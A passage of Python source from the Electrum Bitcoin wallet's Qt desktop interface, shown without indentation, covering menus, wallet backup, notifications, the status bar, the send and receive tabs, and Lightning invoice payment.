try:
new_path = self.wallet.save_backup()
except BaseException as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
return
if new_path:
msg = _("A copy of your wallet file was created in")+" '%s'" % str(new_path)
self.show_message(msg, title=_("Wallet backup created"))
else:
self.show_message(_("You need to configure a backup directory in your preferences"), title=_("Backup not created"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)]
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.wallet.storage.path))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename = get_new_wallet_name(wallet_folder)
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save backup"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_wallet_info)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
history_menu.addAction(_("&Summary"), self.history_list.show_summary)
history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.export_invoices())
requests_menu = wallet_menu.addMenu(_("Requests"))
requests_menu.addAction(_("Import"), lambda: self.import_requests())
requests_menu.addAction(_("Export"), lambda: self.export_requests())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.channels_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools")) # type: QMenu
preferences_action = tools_menu.addAction(_("Preferences"), self.settings_dialog) # type: QAction
if sys.platform == 'darwin':
# "Settings"/"Preferences" are all reserved keywords in macOS.
# preferences_action will get picked up based on name (and put into a standardized location,
# and given a standard reserved hotkey)
# Hence, this menu item will be at a "uniform location re macOS processes"
preferences_action.setMenuRole(QAction.PreferencesRole) # make sure OS recognizes it as preferences
# Add another preferences item, to also have a "uniform location for Electrum between different OSes"
tools_menu.addAction(_("Electrum preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), self.gui_object.show_network_dialog).setEnabled(bool(self.network))
tools_menu.addAction(_("&Lightning Network"), self.gui_object.show_lightning_dialog).setEnabled(bool(self.wallet.has_lightning() and self.network))
tools_menu.addAction(_("Local &Watchtower"), self.gui_object.show_watchtower_dialog).setEnabled(bool(self.network and self.network.local_watchtower))
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Check for updates"), self.show_update_check)
help_menu.addAction(_("&Official website"), lambda: webopen("https://electrum.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webopen("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters().server.host
self.pay_to_URI('bitcoin:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum",
(_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Bitcoin.") + " " +
_("You do not need to perform regular backups, because your wallet can be "
"recovered from a secret phrase that you can memorize or write on paper.") + " " +
_("Startup times are instant because it operates in conjunction with high-performance "
"servers that handle the most complicated parts of the Bitcoin system.") + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_update_check(self, version=None):
self.gui_object._update_check = UpdateCheck(latest_version=version)
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
f'''<a href="{constants.GIT_REPO_ISSUES_URL}">{constants.GIT_REPO_ISSUES_URL}</a><br/><br/>''',
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum - " + _("Reporting Bugs"), rich_text=True)
def notify_transactions(self):
if self.tx_notification_queue.qsize() == 0:
return
if not self.wallet.up_to_date:
return # no notifications while syncing
now = time.time()
rate_limit = 20 # seconds
if self.tx_notification_last_time + rate_limit > now:
return
self.tx_notification_last_time = now
self.logger.info("Notifying GUI about new transactions")
txns = []
while True:
try:
txns.append(self.tx_notification_queue.get_nowait())
except queue.Empty:
break
# Combine the transactions if there are at least three
if len(txns) >= 3:
total_amount = 0
for tx in txns:
tx_wallet_delta = self.wallet.get_wallet_delta(tx)
if not tx_wallet_delta.is_relevant:
continue
total_amount += tx_wallet_delta.delta
self.notify(_("{} new transactions: Total amount received in the new transactions {}")
.format(len(txns), self.format_amount_and_units(total_amount)))
else:
for tx in txns:
tx_wallet_delta = self.wallet.get_wallet_delta(tx)
if not tx_wallet_delta.is_relevant:
continue
self.notify(_("New transaction: {}").format(self.format_amount_and_units(tx_wallet_delta.delta)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electrum", message, read_QIcon("electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum", message, QSystemTrayIcon.Information, 20000)
def timer_actions(self):
self.request_list.refresh_status()
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
elif not self.wallet.up_to_date:
# this updates "synchronizing" progress
self.update_status()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
self.notify_transactions()
def format_amount(self, x, is_diff=False, whitespaces=False):
# x is in sats
return self.config.format_amount(x, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount):
# amount is in sats
text = self.config.format_amount_and_units(amount)
x = self.fx.format_amount_and_units(amount) if self.fx else None
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
return self.config.format_fee_rate(fee_rate)
def get_decimal_point(self):
return self.config.get_decimal_point()
def base_unit(self):
return self.config.get_base_unit()
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None:
text = _("Offline")
icon = read_QIcon("status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
text = ("{} ({}/{})"
.format(_("Synchronizing..."), num_answered, num_sent))
icon = read_QIcon("status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = read_QIcon("status_lagging%s.png"%fork_str)
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
if self.wallet.has_lightning():
l = self.wallet.lnworker.get_balance()
text += u' \U000026a1 %s'%(self.format_amount_and_units(l).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = read_QIcon("status_connected%s.png"%fork_str)
else:
icon = read_QIcon("status_connected_proxy%s.png"%fork_str)
else:
if self.network.proxy:
text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
else:
text = _("Not connected")
icon = read_QIcon("status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
if self.status_button:
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self, wallet=None):
if wallet is None:
wallet = self.wallet
if wallet != self.wallet:
return
self.history_model.refresh('update_tabs')
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.channels_list.update_rows.emit(wallet)
self.update_completions()
def create_channels_tab(self):
self.channels_list = ChannelsList(self)
t = self.channels_list.get_toolbar()
return self.create_list_tab(self.channels_list, t)
def create_history_tab(self):
self.history_model = HistoryModel(self)
self.history_list = l = HistoryList(self, self.history_model)
self.history_model.set_view(self.history_list)
l.searchable_list = l
toolbar = l.create_toolbar(self.config)
toolbar_shown = bool(self.config.get('show_toolbar_history', False))
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_channel(self, channel_id):
from . import channel_details
channel_details.ChannelDetailsDialog(self, channel_id).show()
def show_transaction(self, tx, *, tx_desc=None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, parent=self, desc=tx_desc)
def show_lightning_transaction(self, tx_item):
from .lightning_tx_dialog import LightningTxDialog
d = LightningTxDialog(self, tx_item)
d.show()
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 0, 0)
grid.addWidget(self.receive_message_e, 0, 1, 1, 4)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 1, 0)
grid.addWidget(self.receive_amount_e, 1, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 1, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.connect_fields(self, self.amount_e, self.fiat_send_e, None)
self.expires_combo = QComboBox()
evl = sorted(pr_expiration_values.items())
evl_keys = [i[0] for i in evl]
evl_values = [i[1] for i in evl]
default_expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
try:
i = evl_keys.index(default_expiry)
except ValueError:
i = 0
self.expires_combo.addItems(evl_values)
self.expires_combo.setCurrentIndex(i)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
def on_expiry(i):
self.config.set_key('request_expiry', evl_keys[i])
self.expires_combo.currentIndexChanged.connect(on_expiry)
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Bitcoin addresses.'),
_('The bitcoin address never expires and will always be part of this electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Expires after'), msg), 2, 0)
grid.addWidget(self.expires_combo, 2, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 2, 1)
self.clear_invoice_button = QPushButton(_('Clear'))
self.clear_invoice_button.clicked.connect(self.clear_receive_tab)
self.create_invoice_button = QPushButton(_('New Address'))
self.create_invoice_button.setIcon(read_QIcon("bitcoin.png"))
self.create_invoice_button.setToolTip('Create on-chain request')
self.create_invoice_button.clicked.connect(lambda: self.create_invoice(False))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_invoice_button)
buttons.addWidget(self.create_invoice_button)
if self.wallet.has_lightning():
self.create_invoice_button.setText(_('New Address'))
self.create_lightning_invoice_button = QPushButton(_('Lightning'))
self.create_lightning_invoice_button.setToolTip('Create lightning request')
self.create_lightning_invoice_button.setIcon(read_QIcon("lightning.png"))
self.create_lightning_invoice_button.clicked.connect(lambda: self.create_invoice(True))
buttons.addWidget(self.create_lightning_invoice_button)
grid.addLayout(buttons, 4, 3, 1, 2)
self.receive_payreq_e = ButtonsTextEdit()
self.receive_payreq_e.setFont(QFont(MONOSPACE_FONT))
self.receive_payreq_e.addCopyButton(self.app)
self.receive_payreq_e.setReadOnly(True)
self.receive_payreq_e.textChanged.connect(self.update_receive_qr)
self.receive_payreq_e.setFocusPolicy(Qt.ClickFocus)
self.receive_qr = QRCodeWidget(fixedSize=220)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_address_e = ButtonsTextEdit()
self.receive_address_e.setFont(QFont(MONOSPACE_FONT))
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
self.receive_address_e.textChanged.connect(self.update_receive_address_styling)
qr_show = lambda: self.show_qrcode(str(self.receive_address_e.text()), _('Receiving address'), parent=self)
qr_icon = "qrcode_white.png" if ColorScheme.dark_scheme else "qrcode.png"
self.receive_address_e.addButton(qr_icon, qr_show, _("Show as QR code"))
self.receive_requests_label = QLabel(_('Receive queue'))
from .request_list import RequestList
self.request_list = RequestList(self)
receive_tabs = QTabWidget()
receive_tabs.addTab(self.receive_address_e, _('Address'))
receive_tabs.addTab(self.receive_payreq_e, _('Request'))
receive_tabs.addTab(self.receive_qr, _('QR Code'))
receive_tabs.setCurrentIndex(self.config.get('receive_tabs_index', 0))
receive_tabs.currentChanged.connect(lambda i: self.config.set_key('receive_tabs_index', i))
receive_tabs_sp = receive_tabs.sizePolicy()
receive_tabs_sp.setRetainSizeWhenHidden(True)
receive_tabs.setSizePolicy(receive_tabs_sp)
def maybe_hide_receive_tabs():
receive_tabs.setVisible(bool(self.receive_payreq_e.text()))
self.receive_payreq_e.textChanged.connect(maybe_hide_receive_tabs)
maybe_hide_receive_tabs()
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addStretch()
hbox.addWidget(receive_tabs)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_requests(self, keys):
for key in keys:
self.wallet.delete_request(key)
self.request_list.update()
self.clear_receive_tab()
def delete_lightning_payreq(self, payreq_key):
self.wallet.lnworker.delete_invoice(payreq_key)
self.request_list.update()
self.invoice_list.update()
self.clear_receive_tab()
def sign_payment_request(self, addr):
alias = self.config.get('alias')
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(repr(e))
return
else:
return
def create_invoice(self, is_lightning):
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
if is_lightning:
if not self.wallet.lnworker.channels:
self.show_error(_("You need to open a Lightning channel first."))
return
# TODO maybe show a warning if amount exceeds lnworker.num_sats_can_receive (as in kivy)
key = self.wallet.lnworker.add_request(amount, message, expiry)
else:
key = self.create_bitcoin_request(amount, message, expiry)
if not key:
return
self.address_list.update()
assert key is not None
self.request_list.update()
self.request_list.select_key(key)
# clear request fields
self.receive_amount_e.setText('')
self.receive_message_e.setText('')
# copy to clipboard
r = self.wallet.get_request(key)
content = r.invoice if r.is_lightning() else r.get_address()
title = _('Invoice') if is_lightning else _('Address')
self.do_copy(content, title=title)
def create_bitcoin_request(self, amount, message, expiration) -> Optional[str]:
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic(): # imported wallet
msg = [
_('No more addresses in your wallet.'), ' ',
_('You are using a non-deterministic wallet, which cannot create new addresses.'), ' ',
_('If you want to create new addresses, use a deterministic wallet instead.'), '\n\n',
_('Creating a new payment request will reuse one of your addresses and overwrite an existing request. Continue anyway?'),
]
if not self.question(''.join(msg)):
return
addr = self.wallet.get_receiving_address()
else: # deterministic wallet
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req)
except Exception as e:
self.logger.exception('Error adding payment request')
self.show_error(_('Error adding payment request') + ':\n' + repr(e))
else:
self.sign_payment_request(addr)
return addr
def do_copy(self, content: str, *, title: str = None) -> None:
self.app.clipboard().setText(content)
if title is None:
tooltip_text = _("Text copied to clipboard").format(title)
else:
tooltip_text = _("{} copied to clipboard").format(title)
QToolTip.showText(QCursor.pos(), tooltip_text, self)
def clear_receive_tab(self):
self.receive_payreq_e.setText('')
self.receive_address_e.setText('')
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
self.request_list.clearSelection()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def update_receive_qr(self):
uri = str(self.receive_payreq_e.text())
if maybe_extract_bolt11_invoice(uri):
# encode lightning invoices as uppercase so QR encoding can use
# alphanumeric mode; resulting in smaller QR codes
uri = uri.upper()
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.qrw.setData(uri)
def update_receive_address_styling(self):
addr = str(self.receive_address_e.text())
if is_address(addr) and self.wallet.is_used(addr):
self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
self.receive_address_e.setToolTip(_("This address has already been used. "
"For better privacy, do not reuse it for new payments."))
else:
self.receive_address_e.setStyleSheet("")
self.receive_address_e.setToolTip("")
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
self.payto_e.addPasteButton(self.app)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Bitcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = FreezableLineEdit()
self.message_e.setMinimumWidth(700)
grid.addWidget(self.message_e, 2, 1, 1, -1)
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 3, 0)
grid.addWidget(self.amount_e, 3, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 3, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(100)
self.max_button.setCheckable(True)
grid.addWidget(self.max_button, 3, 3)
self.save_button = EnterButton(_("Save"), self.do_save_invoice)
self.send_button = EnterButton(_("Pay") + "...", self.do_pay)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.save_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 4)
self.amount_e.shortcut.connect(self.spend_max)
def reset_max(text):
self.max_button.setChecked(False)
enable = not bool(text) and not self.amount_e.isReadOnly()
#self.max_button.setEnabled(enable)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
self.set_onchain(False)
self.invoices_label = QLabel(_('Send queue'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
hbox.addStretch(1)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
if run_hook('abort_send', self):
return
outputs = self.payto_e.get_outputs(True)
if not outputs:
return
make_tx = lambda fee_est: self.wallet.make_unsigned_transaction(
coins=self.get_coins(),
outputs=outputs,
fee=fee_est,
is_sweep=False)
try:
try:
tx = make_tx(None)
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
# Check if we had enough funds excluding fees,
# if so, still provide opportunity to set lower fees.
tx = make_tx(0)
except MultipleSpendMaxTxOutputs as e:
self.max_button.setChecked(False)
self.show_error(str(e))
return
except NotEnoughFunds as e:
self.max_button.setChecked(False)
text = self.get_text_not_enough_funds_mentioning_frozen()
self.show_error(text)
return
self.max_button.setChecked(True)
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
self.amount_e.setAmount(amount_after_all_fees)
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
@protected
def protect(self, func, args, password):
return func(*args, password)
def read_outputs(self) -> List[PartialTxOutput]:
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
outputs = self.payto_e.get_outputs(self.max_button.isChecked())
return outputs
def check_send_tab_onchain_outputs_and_show_errors(self, outputs: List[PartialTxOutput]) -> bool:
"""Returns whether there are errors with outputs.
Also shows error dialog to user if so.
"""
if not outputs:
self.show_error(_('No outputs'))
return True
for o in outputs:
if o.scriptpubkey is None:
self.show_error(_('Bitcoin Address is None'))
return True
if o.value is None:
self.show_error(_('Invalid Amount'))
return True
return False # no errors
def check_send_tab_payto_line_and_show_errors(self) -> bool:
"""Returns whether there are errors.
Also shows error dialog to user if so.
"""
pr = self.payment_request
if pr:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
return True
if not pr:
errors = self.payto_e.get_errors()
if errors:
if len(errors) == 1 and not errors[0].is_multiline:
err = errors[0]
self.show_warning(_("Failed to parse 'Pay to' line") + ":\n" +
f"{err.line_content[:40]}...\n\n"
f"{err.exc!r}")
else:
self.show_warning(_("Invalid Lines found:") + "\n\n" +
'\n'.join([_("Line #") +
f"{err.idx+1}: {err.line_content[:40]}... ({err.exc!r})"
for err in errors]))
return True
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return True
return False # no errors
def pay_lightning_invoice(self, invoice: str, *, amount_msat: Optional[int]):
if amount_msat is None:
raise Exception("missing amount for LN invoice")
amount_sat = Decimal(amount_msat) / 1000
# FIXME this is currently lying to user as we truncate to satoshis
msg = _("Pay lightning invoice?") + '\n\n' + _("This will send {}?").format(self.format_amount_and_units(amount_sat))
if not self.question(msg):
return
self.save_pending_invoice()
attempts = LN_NUM_PAYMENT_ATTEMPTS
def task():
self.wallet.lnworker.pay(invoice, amount_msat=amount_msat, attempts=attempts)
self.wallet.thread.add(task)
def on_request_status(self, wallet, key, status):
if wallet != self.wallet:
return
req = self.wallet.receive_requests.get(key)
if req is None:
return
self.request_list.update_item(key, req)
self.request_list.update()
if status == PR_PAID:
self.notify(_('Payment received') + '\n' + key)
self.need_update.set()
def on_invoice_status(self, wallet, key):
if wallet != self.wallet:
return
